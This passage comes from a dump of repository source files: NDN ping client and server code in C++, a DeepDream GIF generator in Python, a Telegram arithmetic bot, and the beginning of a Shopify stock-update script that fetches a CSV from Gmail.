nack,\n uint64_t seq,\n const time::steady_clock::TimePoint& sendTime);\n\n /**\n * @brief Called when ping timed out\n *\n * @param interest NDN interest\n * @param seq ping sequence number\n */\n void\n onTimeout(const Interest& interest, uint64_t seq);\n\n /**\n * @brief Called after ping received or timed out\n */\n void\n finish();\n\nprivate:\n const Options& m_options;\n int m_nSent;\n uint64_t m_nextSeq;\n int m_nOutstanding;\n Face& m_face;\n scheduler::Scheduler m_scheduler;\n scheduler::ScopedEventId m_nextPingEvent;\n};\n\n} // namespace client\n} // namespace ping\n} // 
namespace ndn\n\n#endif // NDN_BCE_CONSUMER_HPP\n" }, { "alpha_fraction": 0.6721054315567017, "alphanum_fraction": 0.6736742854118347, "avg_line_length": 24.496000289916992, "blob_id": "c37f51f4f9a63b8f4bdea5eac20837872a9c30bc", "content_id": "0c574a7c3c68140f3ca2cdd67631b04ff44c8a33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3187, "license_type": "no_license", "max_line_length": 100, "num_lines": 125, "path": "/src/server/ndn-producer-bce.hpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 2015, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. If not, see <http://www.gnu.org/licenses/>.\n *\n * @author Eric Newberry <[email protected]>\n * @author Jerald Paul Abraham <[email protected]>\n */\n\n#ifndef NDN_BCE_PRODUCER_HPP\n#define NDN_BCE_PRODUCER_HPP\n\n#include \"../common.hpp\"\n\nnamespace ndn {\nnamespace ping {\nnamespace server {\n\n/**\n * @brief options for ndnping server\n */\nstruct Options\n{\n Name prefix; //!< prefix to register\n time::milliseconds freshnessPeriod; //!< freshness period\n bool shouldLimitSatisfied; //!< should limit the number of pings satisfied\n int nMaxPings; //!< max number of pings to satisfy\n bool shouldPrintTimestamp; //!< print timestamp when response sent\n int payloadSize; //!< user specified payload size\n};\n\n/**\n * @brief NDN modular ping server\n */\nclass PingServer : noncopyable\n{\npublic:\n PingServer(Face& face, KeyChain& keyChain, const Options& options);\n\n /**\n * @brief Signals when Interest received\n *\n * @param name incoming interest name\n */\n signal::Signal<PingServer, Name> afterReceive;\n\n /**\n * @brief Signals when finished pinging\n */\n signal::Signal<PingServer> afterFinish;\n\n /** @brief starts ping server\n *\n * If options.shouldLimitSatisfied is false, this method does not return unless there's an error.\n * Otherwise, this method returns when options.nMaxPings Interests are processed.\n */\n void\n run();\n\n /**\n * @brief starts the Interest filter\n *\n * @note This method is non-blocking and caller need to call face.processEvents()\n */\n void\n start();\n\n /**\n * @brief Unregister set interest filter\n */\n void\n stop();\n\n /**\n * @brief gets the number of pings received\n */\n int\n getNPings() const;\n\nprivate:\n /**\n * @brief Called when interest received\n *\n * @param interest incoming interest\n */\n void\n onInterest(const Interest& interest);\n\n /**\n * @brief Called when prefix registration failed\n *\n * @param reason reason for failure\n */\n void\n onRegisterFailed(const std::string& reason);\n\nprivate:\n const Options& m_options;\n KeyChain& 
m_keyChain;\n Name m_name;\n int m_nPings;\n Face& m_face;\n Block m_payload;\n\n const RegisteredPrefixId* m_registeredPrefixId;\n};\n\n} // namespace server\n} // namespace ping\n} // namespace ndn\n\n#endif //NDN_BCE_PRODUCER_HPP\n" }, { "alpha_fraction": 0.64573734998703, "alphanum_fraction": 0.6540898680686951, "avg_line_length": 22.944828033447266, "blob_id": "cfc133c98f58f1ef1363c62b49c84f86ca9c3e57", "content_id": "7ddb6464894ad2aa4dc9b1e32997fec36a364ab6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3472, "license_type": "no_license", "max_line_length": 100, "num_lines": 145, "path": "/src/client/ndn-consumer-bce.cpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 2014-2017, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. If not, see <http://www.gnu.org/licenses/>.\n *\n * @author: Jerald Paul Abraham <[email protected]>\n * @author: Eric Newberry <[email protected]>\n * @author: Teng Liang <[email protected]>\n */\n\n#include \"ndn-consumer-bce.hpp\"\n#include <ndn-cxx/util/random.hpp>\n\nnamespace ndn {\nnamespace ping {\nnamespace client {\n\nPing::Ping(Face& face, const Options& options)\n : m_options(options)\n , m_nSent(0)\n , m_nextSeq(options.startSeq)\n , m_nOutstanding(0)\n , m_face(face)\n , m_scheduler(m_face.getIoService())\n , m_nextPingEvent(m_scheduler)\n{\n if (m_options.shouldGenerateRandomSeq) {\n m_nextSeq = random::generateWord64();\n }\n}\n\nvoid\nPing::start()\n{\n performPing();\n}\n\nvoid\nPing::stop()\n{\n m_nextPingEvent.cancel();\n}\n\nvoid\nPing::performPing()\n{\n BOOST_ASSERT((m_options.nPings < 0) || (m_nSent < m_options.nPings));\n\n Name pingPacketName = makePingName(m_nextSeq);\n\n Interest interest(pingPacketName);\n interest.setMustBeFresh(!m_options.shouldAllowStaleData);\n interest.setInterestLifetime(m_options.timeout);\n\n auto now = time::steady_clock::now();\n m_face.expressInterest(interest,\n bind(&Ping::onData, this, _1, _2, m_nextSeq, now),\n bind(&Ping::onNack, this, _1, _2, m_nextSeq, now),\n bind(&Ping::onTimeout, this, _1, m_nextSeq));\n\n ++m_nSent;\n ++m_nextSeq;\n ++m_nOutstanding;\n\n if ((m_options.nPings < 0) || (m_nSent < m_options.nPings)) {\n m_nextPingEvent = m_scheduler.scheduleEvent(m_options.interval, bind(&Ping::performPing, this));\n }\n else {\n finish();\n }\n}\n\nvoid\nPing::onData(const Interest& interest,\n const Data& data,\n uint64_t seq,\n const time::steady_clock::TimePoint& sendTime)\n{\n time::nanoseconds rtt = time::steady_clock::now() - sendTime;\n\n afterData(seq, rtt);\n\n finish();\n}\n\nvoid\nPing::onNack(const Interest& interest,\n const lp::Nack& nack,\n uint64_t seq,\n 
const time::steady_clock::TimePoint& sendTime)\n{\n time::nanoseconds rtt = time::steady_clock::now() - sendTime;\n\n afterNack(seq, rtt, nack.getHeader());\n\n finish();\n}\n\nvoid\nPing::onTimeout(const Interest& interest, uint64_t seq)\n{\n afterTimeout(seq);\n\n finish();\n}\n\nvoid\nPing::finish()\n{\n if (--m_nOutstanding >= 0) {\n return;\n }\n\n afterFinish();\n}\n\nName\nPing::makePingName(uint64_t seq) const\n{\n Name name(m_options.prefix);\n name.append(\"ping\");\n if (!m_options.clientIdentifier.empty()) {\n name.append(m_options.clientIdentifier);\n }\n name.append(std::to_string(seq));\n\n return name;\n}\n\n} // namespace client\n} // namespace ping\n} // namespace ndn\n" }, { "alpha_fraction": 0.6761207580566406, "alphanum_fraction": 0.6761207580566406, "avg_line_length": 42.68000030517578, "blob_id": "475c6e6706274664ef51936599e425f15f361c2c", "content_id": "aa9480a2abf0ee8ab58ff938f9a17530930ee3f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1093, "license_type": "no_license", "max_line_length": 194, "num_lines": 25, "path": "/wscript", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nAPPNAME = 'broadcast-encryption'\n\ntop = '.'\nout = 'build'\n\ndef options(opt):\n opt.load(['compiler_c', 'compiler_cxx'])\n opt.load(['boost'], tooldir=['.waf-tools'])\n\ndef configure(conf):\n conf.load(['compiler_c', 'compiler_cxx'])\n conf.check_boost(lib='system iostreams regex')\n conf.check_cfg(package='libndn-cxx', args=['--cflags', '--libs'],\n uselib_store='NDN_CXX', mandatory=True)\n\ndef build(bld):\n #bld.read_shlib('gmp', paths=['/usr/local/lib'])\n #bld.read_shlib('pbc', paths=['/usr/local/lib'])\n bld.shlib(source='src/client/ndn-consumer-bce.cpp src/client/statistics-collector.cpp src/client/tracer.cpp src/server/ndn-producer-bce.cpp src/server/tracer.cpp', target='bce', use='NDN_CXX')\n bld.program(source='example/consumer.cpp', target='consumer', use='bce', includes=\"src/client\")\n bld.program(source='example/producer.cpp', target='producer', use='bce', includes=\"src/server\")\n #bld.shlib(source='src/bce.c', target='bce', use='gmp pbc')\n #bld.program(source='tests/testbce.c', target='test', use='gmp pbc bce', includes=\"src\")\n\n" }, { "alpha_fraction": 0.6947368383407593, "alphanum_fraction": 0.6947368383407593, "avg_line_length": 22.75, "blob_id": "574f305ac7ec9ab2197415f00408983e0d096e25", "content_id": "6e16124838ceb1dc7b1913923b575b6987e0af3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 95, "license_type": "no_license", "max_line_length": 65, "num_lines": 4, "path": "/README.md", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "broadcast-encryption\n======\n\nA warp of [PBC_BCE](https://crypto.stanford.edu/pbc/bce/) for NDN\n" }, { "alpha_fraction": 0.6360103487968445, "alphanum_fraction": 0.6415802836418152, "avg_line_length": 27.382352828979492, "blob_id": "74f603a96098d06719ca8b59b8398614a307f940", "content_id": "8a44fec416693ae02ef4e83e3a26a8dd93022f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7720, "license_type": "no_license", "max_line_length": 100, "num_lines": 272, "path": "/example/consumer.cpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 
2014-2015, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. If not, see <http://www.gnu.org/licenses/>.\n *\n * @author: Jerald Paul Abraham <[email protected]>\n * @author: Eric Newberry <[email protected]>\n */\n\n#include \"ndn-consumer-bce.hpp\"\n#include \"statistics-collector.hpp\"\n#include \"tracer.hpp\"\n\nnamespace ndn {\nnamespace ping {\nnamespace client {\n\nclass Runner : noncopyable\n{\npublic:\n explicit\n Runner(const Options& options)\n : m_ping(m_face, options)\n , m_statisticsCollector(m_ping, options)\n , m_tracer(m_ping, options)\n , m_signalSetInt(m_face.getIoService(), SIGINT)\n , m_signalSetQuit(m_face.getIoService(), SIGQUIT)\n {\n m_signalSetInt.async_wait(bind(&Runner::afterIntSignal, this, _1));\n m_signalSetQuit.async_wait(bind(&Runner::afterQuitSignal, this, _1));\n\n m_ping.afterFinish.connect([this] {\n this->cancel();\n });\n }\n\n int\n run()\n {\n try {\n m_ping.start();\n m_face.processEvents();\n }\n catch (std::exception& e) {\n m_tracer.onError(e.what());\n return 2;\n }\n\n Statistics statistics = m_statisticsCollector.computeStatistics();\n\n std::cout << statistics << std::endl;\n\n if (statistics.nReceived == statistics.nSent) {\n return 0;\n }\n else {\n return 1;\n }\n }\n\nprivate:\n void\n cancel()\n {\n m_signalSetInt.cancel();\n m_signalSetQuit.cancel();\n m_ping.stop();\n }\n\n void\n afterIntSignal(const boost::system::error_code& errorCode)\n {\n if (errorCode == boost::asio::error::operation_aborted) {\n return;\n }\n\n cancel();\n }\n\n void\n afterQuitSignal(const boost::system::error_code& errorCode)\n {\n if (errorCode == boost::asio::error::operation_aborted) {\n return;\n }\n\n m_statisticsCollector.computeStatistics().printSummary(std::cout);\n m_signalSetQuit.async_wait(bind(&Runner::afterQuitSignal, this, _1));\n };\n\nprivate:\n Face m_face;\n Ping m_ping;\n StatisticsCollector m_statisticsCollector;\n Tracer m_tracer;\n\n boost::asio::signal_set m_signalSetInt;\n boost::asio::signal_set m_signalSetQuit;\n};\n\nstatic time::milliseconds\ngetMinimumPingInterval()\n{\n return time::milliseconds(1);\n}\n\nstatic time::milliseconds\ngetDefaultPingInterval()\n{\n return time::milliseconds(1000);\n}\n\nstatic time::milliseconds\ngetDefaultPingTimeoutThreshold()\n{\n return time::milliseconds(4000);\n}\n\nstatic void\nusage(const boost::program_options::options_description& options)\n{\n std::cout << \"Usage: ndnping [options] ndn:/name/prefix\\n\"\n \"\\n\"\n \"Ping a NDN name prefix using Interests with name ndn:/name/prefix/ping/number.\\n\"\n \"The numbers in the Interests are randomly generated unless specified.\\n\"\n \"\\n\";\n std::cout << options;\n exit(2);\n}\n\nint\nmain(int argc, char* argv[])\n{\n Options options;\n options.shouldAllowStaleData = false;\n options.nPings = 
-1;\n options.interval = time::milliseconds(getDefaultPingInterval());\n options.timeout = time::milliseconds(getDefaultPingTimeoutThreshold());\n options.startSeq = 0;\n options.shouldGenerateRandomSeq = true;\n options.shouldPrintTimestamp = false;\n\n std::string identifier;\n\n namespace po = boost::program_options;\n\n po::options_description visibleOptDesc(\"Allowed options\");\n visibleOptDesc.add_options()\n (\"help,h\", \"print this message and exit\")\n (\"version,V\", \"display version and exit\")\n (\"interval,i\", po::value<int>(),\n (\"set ping interval in milliseconds (default \" +\n std::to_string(getDefaultPingInterval().count()) + \" ms - minimum \" +\n std::to_string(getMinimumPingInterval().count()) + \" ms)\").c_str())\n (\"timeout,o\", po::value<int>(),\n (\"set ping timeout in milliseconds (default \" +\n std::to_string(getDefaultPingTimeoutThreshold().count()) + \" ms)\").c_str())\n (\"count,c\", po::value<int>(&options.nPings), \"set total number of pings\")\n (\"start,n\", po::value<uint64_t>(&options.startSeq),\n \"set the starting seq number, the number is incremented by 1 after each Interest\")\n (\"identifier,p\", po::value<std::string>(&identifier),\n \"add identifier to the Interest names before the numbers to avoid conflict\")\n (\"cache,a\", \"allows routers to return stale Data from cache\")\n (\"timestamp,t\", \"print timestamp with messages\")\n ;\n po::options_description hiddenOptDesc(\"Hidden options\");\n hiddenOptDesc.add_options()\n (\"prefix\", po::value<std::string>(), \"prefix to send pings to\")\n ;\n\n po::options_description optDesc(\"Allowed options\");\n optDesc.add(visibleOptDesc).add(hiddenOptDesc);\n\n try {\n po::positional_options_description optPos;\n optPos.add(\"prefix\", -1);\n\n po::variables_map optVm;\n po::store(po::command_line_parser(argc, argv).options(optDesc).positional(optPos).run(), optVm);\n po::notify(optVm);\n\n if (optVm.count(\"help\") > 0) {\n usage(visibleOptDesc);\n }\n\n if (optVm.count(\"version\") > 0) {\n //std::cout << \"ndnping \" << tools::VERSION << std::endl;\n exit(0);\n }\n\n if (optVm.count(\"prefix\") > 0) {\n options.prefix = Name(optVm[\"prefix\"].as<std::string>());\n }\n else {\n std::cerr << \"ERROR: No prefix specified\" << std::endl;\n usage(visibleOptDesc);\n }\n\n if (optVm.count(\"interval\") > 0) {\n options.interval = time::milliseconds(optVm[\"interval\"].as<int>());\n\n if (options.interval.count() < getMinimumPingInterval().count()) {\n std::cerr << \"ERROR: Specified ping interval is less than the minimum \" <<\n getMinimumPingInterval() << std::endl;\n usage(visibleOptDesc);\n }\n }\n\n if (optVm.count(\"timeout\") > 0) {\n options.timeout = time::milliseconds(optVm[\"timeout\"].as<int>());\n }\n\n if (optVm.count(\"count\") > 0) {\n if (options.nPings <= 0) {\n std::cerr << \"ERROR: Number of ping must be positive\" << std::endl;\n usage(visibleOptDesc);\n }\n }\n\n if (optVm.count(\"start\") > 0) {\n options.shouldGenerateRandomSeq = false;\n }\n\n if (optVm.count(\"identifier\") > 0) {\n bool isIdentifierAcceptable = std::all_of(identifier.begin(), identifier.end(), &isalnum);\n if (identifier.empty() || !isIdentifierAcceptable) {\n std::cerr << \"ERROR: Unacceptable client identifier\" << std::endl;\n usage(visibleOptDesc);\n }\n\n options.clientIdentifier = name::Component(identifier);\n }\n\n if (optVm.count(\"cache\") > 0) {\n options.shouldAllowStaleData = true;\n }\n\n if (optVm.count(\"timestamp\") > 0) {\n options.shouldPrintTimestamp = true;\n }\n }\n catch (const 
po::error& e) {\n std::cerr << \"ERROR: \" << e.what() << std::endl;\n usage(visibleOptDesc);\n }\n\n std::cout << \"PING \" << options.prefix << std::endl;\n return Runner(options).run();\n}\n\n} // namespace client\n} // namespace ping\n} // namespace ndn\n\nint\nmain(int argc, char** argv)\n{\n return ndn::ping::client::main(argc, argv);\n}\n" } ]
8
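The broadcast-encryption row builds its example consumer and producer with waf: the `wscript` above compiles the sources into a shared `bce` library and links the two example programs against it via `use=`. A minimal build script following the same shlib-plus-program pattern (the source and target names here are placeholders, not the repo's):

```python
#!/usr/bin/env python
# Run with: waf configure build

top = '.'
out = 'build'

def options(opt):
    opt.load(['compiler_c', 'compiler_cxx'])

def configure(conf):
    conf.load(['compiler_c', 'compiler_cxx'])

def build(bld):
    # build a shared library first, then a program that links against it
    bld.shlib(source='src/lib.cpp', target='mylib')
    bld.program(source='example/main.cpp', target='demo', use='mylib')
```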
orelyehuda/dreamer
https://github.com/orelyehuda/dreamer
3c525417e39f88d130e2d9681f0562c7a7ca2261
51dc57d1121804f2e0e8b05c2bbe5b38045fc639
d54a5ad4b215b13a14aa89f45985d05ddc93c6e6
refs/heads/main
2023-08-11T19:31:44.483110
2021-09-19T07:32:01
2021-09-19T07:32:01
324,271,470
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6991869807243347, "alphanum_fraction": 0.707317054271698, "avg_line_length": 16.285715103149414, "blob_id": "2e208284e26e4c8ee51f7eae448354b560428d92", "content_id": "b324aa3b0b7bb090dbdc6205d5cdea0d7093b8c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 77, "num_lines": 7, "path": "/README.md", "repo_name": "orelyehuda/dreamer", "src_encoding": "UTF-8", "text": "\n(Deep Dream GIF)\nUtilized Google's deep-dream model to output a GIF translation of the output.\n\n\n<DEMO:>\n\n![](demo1.gif)\n\n" }, { "alpha_fraction": 0.6418468952178955, "alphanum_fraction": 0.6578618884086609, "avg_line_length": 24.705883026123047, "blob_id": "96848c6bc82602098d36cf8e0056128b3acc246a", "content_id": "a4ff1dc5876cfa0c3c80b3b909880ab25e6ae24b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4808, "license_type": "no_license", "max_line_length": 116, "num_lines": 187, "path": "/dreamer.py", "repo_name": "orelyehuda/dreamer", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[91]:\n\n\nimport tensorflow as tf\n\n\n# In[137]:\n\n\nimport numpy as np \n\nimport os\n\nimport matplotlib as mpl\n\nimport IPython.display as display\nimport PIL.Image\n\nfrom tensorflow.keras.preprocessing import image\n\nimport glob\n\nimport random\n\npath = \"imgs/img1.jpg\"\n\n\ndef open_image(path, max_dim=None):\n img = PIL.Image.open(path)\n if max_dim:\n img.thumbnail((max_dim, max_dim))\n return np.array(img)\n\n\n\n# Download an image and read it into a NumPy array.\ndef download(url, max_dim=None):\n name = url.split('/')[-1]\n image_path = tf.keras.utils.get_file(name, origin=url)\n img = PIL.Image.open(image_path)\n if max_dim:\n img.thumbnail((max_dim, max_dim))\n return np.array(img)\n\n\n# Normalize an image\ndef deprocess(img):\n img = 255*(img + 1.0)/2.0\n return tf.cast(img, tf.uint8)\n\n#Save an image\ndef save_image(image, filename):\n # Ensure the pixel-values are between 0 and 255.\n image = np.clip(image, 0.0, 255.0)\n \n # Convert to bytes.\n image = image.astype(np.uint8)\n \n with open(filename, 'wb') as file:\n PIL.Image.fromarray(image).save(filename, 'png')\n \n \n \n# Display an image\ndef show(img):\n display.display(PIL.Image.fromarray(np.array(img)))\n\n\n#original_img = download(url, max_dim=850)\noriginal_img = open_image(path, max_dim=None)\n\nbase_model = tf.keras.applications.InceptionV3(include_top=False, weights='imagenet')\n\n\n# Maximize the activations of these layers\nnames = ['mixed8']\nlayers = [base_model.get_layer(name).output for name in names]\n\n# Create the feature extraction model\ndream_model = tf.keras.Model(inputs=base_model.input, outputs=layers)\n\n\n# ## Calculate loss\n\ndef calc_loss(img, model):\n # Pass forward the image through the model to retrieve the activations.\n # Converts the image into a batch of size 1.\n img_batch = tf.expand_dims(img, axis=0)\n layer_activations = model(img_batch)\n if len(layer_activations) == 1:\n layer_activations = [layer_activations]\n\n losses = []\n for act in layer_activations:\n loss = tf.math.reduce_mean(act)\n losses.append(loss)\n\n return tf.reduce_sum(losses)\n\n\n# ## Gradient ascent\n\nclass DeepDream(tf.Module):\n def __init__(self, model):\n self.model = model\n\n @tf.function(\n input_signature=(\n tf.TensorSpec(shape=[None,None,3], dtype=tf.float32),\n tf.TensorSpec(shape=[], dtype=tf.int32),\n 
tf.TensorSpec(shape=[], dtype=tf.float32),)\n )\n def __call__(self, img, steps, step_size):\n print(\"Tracing\")\n loss = tf.constant(0.0)\n for n in tf.range(steps):\n with tf.GradientTape() as tape:\n # This needs gradients relative to `img`\n # `GradientTape` only watches `tf.Variable`s by default\n tape.watch(img)\n loss = calc_loss(img, self.model)\n\n # Calculate the gradient of the loss with respect to the pixels of the input image.\n gradients = tape.gradient(loss, img)\n\n # Normalize the gradients.\n gradients /= tf.math.reduce_std(gradients) + 1e-8 \n \n # In gradient ascent, the \"loss\" is maximized so that the input image increasingly \"excites\" the layers.\n # You can update the image by directly adding the gradients (because they're the same shape!)\n img = img + gradients*step_size\n img = tf.clip_by_value(img, -1, 1)\n \n\n return loss, img\n\ndeepdream = DeepDream(dream_model)\n\n# ## Main Loop\n\ndef run_deep_dream_simple(img, steps=150, step_size=0.01, num_frames = 10):\n # Convert from uint8 to the range expected by the model.\n img = tf.keras.applications.inception_v3.preprocess_input(img)\n img = tf.convert_to_tensor(img)\n step_size = tf.convert_to_tensor(step_size)\n steps_remaining = steps\n step = 0\n rand_name = str(random.randint(0,999))\n outputname = \"\\\\Users\\Le Orel\\deepdream\\\\\" + rand_name\n os.mkdir(outputname)\n print(outputname)\n \n while steps_remaining:\n if steps_remaining>100:\n run_steps = tf.constant(100)\n else:\n run_steps = tf.constant(steps_remaining)\n steps_remaining -= run_steps\n step += run_steps\n frames = []\n for k in range(num_frames):\n loss, img = deepdream(img, run_steps, tf.constant(step_size))\n result = deprocess(img)\n \n save_image(result, outputname+ \"\\\\\"+str(k)+ \".png\")\n frames.append(result)\n \n display.clear_output(wait=True)\n print (\"Step {}, loss {}\".format(step, loss))\n\n\n display.clear_output(wait=True)\n show(result)\n\n return result,rand_name\n\n\nnum_frames_calc = 50\ndream_img, filepath = run_deep_dream_simple(img=original_img, steps=3, step_size=0.01, num_frames = num_frames_calc)\n\n\n#Save the frames as a gif\nmake_movie = \"ffmpeg -r \" + str(num_frames_calc) + \" -i \" + filepath + \"\\\\%01d.png -y \" + filepath+ \"\\\\vid.gif\"\nos.system(make_movie)\n\n" } ]
2
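The heart of `dreamer.py` in the row above is a gradient-ascent step: maximise the mean activation of the chosen layer ('mixed8') and nudge the image along the normalised gradient. The same step in isolation — a sketch assuming `model` is a single-output feature extractor such as the InceptionV3-based `tf.keras.Model` built in that script, and `img` a float32 tensor scaled to [-1, 1]:

```python
import tensorflow as tf

def dream_step(model, img, step_size=0.01):
    with tf.GradientTape() as tape:
        tape.watch(img)                     # img is a plain tensor, not a tf.Variable
        activations = model(tf..expand_dims(img, axis=0) if False else tf.expand_dims(img, axis=0))
        loss = tf.reduce_mean(activations)  # "excite" the chosen layer
    gradients = tape.gradient(loss, img)
    gradients /= tf.math.reduce_std(gradients) + 1e-8
    img = img + gradients * step_size       # ascend the loss instead of descending
    return tf.clip_by_value(img, -1, 1), loss
```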
tdakkota/chat_calculating_bot
https://github.com/tdakkota/chat_calculating_bot
d05cfb889320153fd9d43cba775eb9a36fa42326
c60332a353ce956b35e3aaae96c3a2524b5733fe
066dbb38a2512e759bff3498fb9bf74f0ca77eb8
refs/heads/master
2021-05-25T12:16:12.424461
2020-04-07T08:19:53
2020-04-07T08:19:53
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6319514513015747, "alphanum_fraction": 0.6380181908607483, "avg_line_length": 20.9777774810791, "blob_id": "fbceea70393620645de3d151e50b05f75df29c14", "content_id": "ef791cf71cc4e1359974febbaf691d995a7467ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1015, "license_type": "no_license", "max_line_length": 117, "num_lines": 45, "path": "/bot/main.py", "repo_name": "tdakkota/chat_calculating_bot", "src_encoding": "UTF-8", "text": "import decimal\nimport operator\n\nimport telebot\n\nfrom constants import TOKEN\n\nbot = telebot.TeleBot(TOKEN)\n\nOPERATION_MAP = {\n 'плюс': operator.add,\n '+': operator.add,\n 'минус': operator.sub,\n '-': operator.sub,\n 'разделить': operator.truediv,\n '/': operator.truediv,\n 'умножить': operator.mul,\n '*': operator.mul,\n}\n\n\[email protected]_handler()\ndef listen_all_messages(message):\n # bot can work with messages from 3 part\n if len(str(message.text).split()) != 3:\n return\n\n one, two, three = (x.strip() for x in str(message.text).split())\n if two not in OPERATION_MAP:\n return\n\n try:\n one, three = float(one), float(three)\n except ValueError:\n return\n\n try:\n result = decimal.Decimal(OPERATION_MAP[two](one, three)).quantize(decimal.Decimal('.01'), decimal.ROUND_05UP)\n except (ZeroDivisionError, decimal.InvalidOperation):\n return\n\n bot.reply_to(message, f'= {result}')\n\n\nbot.polling(none_stop=True)\n" } ]
1
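The calculating bot above hinges on a single pattern: a dictionary mapping operator tokens (including the Russian words for plus, minus, divide, and multiply) to callables from the `operator` module, with the result quantised to two decimal places. The same dispatch reduced to a plain, testable function — English tokens only, for brevity:

```python
import decimal
import operator

OPS = {'+': operator.add, '-': operator.sub,
       '*': operator.mul, '/': operator.truediv}

def calculate(text):
    parts = text.split()
    if len(parts) != 3 or parts[1] not in OPS:
        return None                          # not a "<number> <op> <number>" message
    try:
        a, b = float(parts[0]), float(parts[2])
        return decimal.Decimal(OPS[parts[1]](a, b)).quantize(
            decimal.Decimal('.01'), decimal.ROUND_05UP)
    except (ValueError, ZeroDivisionError, decimal.InvalidOperation):
        return None

assert str(calculate("2 + 2")) == "4.00"
assert calculate("1 / 0") is None
```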
samsale/shopify-stock-update
https://github.com/samsale/shopify-stock-update
d8394f9d779096031ec9a1f5740758815078121a
b62d42fd887c92ed33af4d4ba51970c8063560f2
d4fdc6b1f5b6a3e1b6c5cc0ba997c52041dc6651
refs/heads/master
2020-04-14T03:29:16.314277
2018-12-30T18:40:32
2018-12-30T18:40:32
163,609,349
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5834966897964478, "alphanum_fraction": 0.590356707572937, "avg_line_length": 30.300613403320312, "blob_id": "02f925be95b5cf5911285ea93d8a252c013fef5f", "content_id": "4956684817a68f780f509a0a3eef6844c8b1c9a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5102, "license_type": "no_license", "max_line_length": 119, "num_lines": 163, "path": "/stock_update.py", "repo_name": "samsale/shopify-stock-update", "src_encoding": "UTF-8", "text": "import email\nimport imaplib\nimport os\nimport csv\nimport json\nimport requests\nimport math\nimport os\nimport time\n\napi_key = ''\npassword = ''\n\nusername = '[email protected]'\npw = ''\nsave_path = '/'\n\n\ndef connect_to_gmail():\n mail = imaplib.IMAP4_SSL('imap.gmail.com')\n mail.login(username, pw)\n print(\"Script Log - Connected to Gmail\")\n return mail\n\n\ndef download_csv(inbox):\n inbox.select(\"StockUpdates\")\n results, data = inbox.uid('search', None, \"ALL\")\n inbox_list = data[0].split()\n email_id = inbox_list[-1]\n newest_result, email_data = inbox.uid('fetch', email_id, '(RFC822)')\n raw_email = email_data[0][1].decode(\"utf-8\")\n email_message = email.message_from_string(raw_email)\n for part in email_message.walk():\n if part.get_content_maintype() == 'multipart':\n continue\n filename = part.get_filename()\n if filename == 'europa stock report.csv':\n with open(os.path.join('/tmp/', filename), 'wb') as fp:\n print(\"Script Log Downloaded csv\",fp)\n fp.write(part.get_payload(decode=True))\n\n\ndef get_file():\n # f = input('What is the file name?')\n # f_ext = f+'.csv'\n file_name = '/tmp/europa stock report.csv'\n return file_name\n\n\ndef get_number_of_pages():\n url = 'https://rubysgardenboutique.myshopify.com/admin/products/count.json'\n r = requests.get(url, auth=(api_key, password))\n json_data = r.json()\n t = int(json_data['count'])\n print (\"Script Log - Number of Products \",t)\n pages = math.ceil(t / 250.0)\n print (\"Script Log - Got number of pages\")\n return pages\n\n\ndef get_all_products(pages):\n d = []\n i = 1\n 